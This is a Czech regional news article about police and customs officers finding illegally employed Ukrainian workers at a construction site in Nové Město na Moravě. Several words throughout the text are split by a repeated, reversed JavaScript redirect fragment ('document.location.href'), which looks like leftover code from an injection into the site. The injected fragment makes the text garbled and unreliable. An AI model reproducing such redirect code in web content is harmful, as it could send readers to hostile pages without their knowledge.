Rainbow page separator

Policisté na stavbě ve Městě objevili čtyři nelegální dělníky

Neděle, 11. června 2017

Policejní auto, policie, měření rychlosti

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Čtyři nelegálně zaměstnané Ukrajince ve spolupráci s celníky zajistili policisté cizinecké policie na stavbě při rekonstrukci objektu v Novém Městě na Moravě. „Kontrola byla zaměřená na oprávněnost pobytu cizinců na území republiky a provádění výdělečné činnosti a dalších povinností vyplývajících z příslušného zákona o pobytu cizinců,“ uvedl Leoš Švarc, vedoucí odboru cizinecké policie krajského policejního ředitelství. V rámci krajské kontroly policisté objevili ještě dalších šest nelegálních Ukrajinců v zemědělském podniku v Habrech na Havlíčkobrodsku.
Cizinci při kontrole předložili doklady s platným vízovým štítkem vydaným v Polsku, což je však neopravňuje k pobytu v České republice, a navíc neměli oprávnění k provádění výdělečné činnosti. Následně byly zahájeny úkony správního řízení ve věci vyhoštění z území členských států EU.
Kontroly policisté směřují i na uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovací zařízení, kde jsou uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továni zejména agenturní zaměstnanci. Jedná se především o Rumuny, Bulhary, Maďary a Ukrajince. Poby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové kontroly probíhají jak z preventivních důvodů, tak kvůli nárůstu případů protiprávního jednání cizinců. „Pozornost zaměřujeme na kontrolu legálnosti pobytu cizinců a pravosti a platnosti dokladů, které předkládají. Zaměřujeme se na odhalování účelových sňatků, na případy napomáhání k neoprávněnému pobytu. Kontrolujeme také, zda cizinci mají povolení k výkonu práce na území České republiky, pokud je povolení podmínkou výkonu zaměstnání,“ doplnil Švarc.
Loni na Vysočině policisté zjistili celkem 85 případů nelegálního zaměstnávání cizinců, le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos už jich je 87. Ti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to lidé byli převážně zaměstnáni prostřednictvím pracovních agentur, nejčastěji šlo o občany Ukrajiny a Moldavska.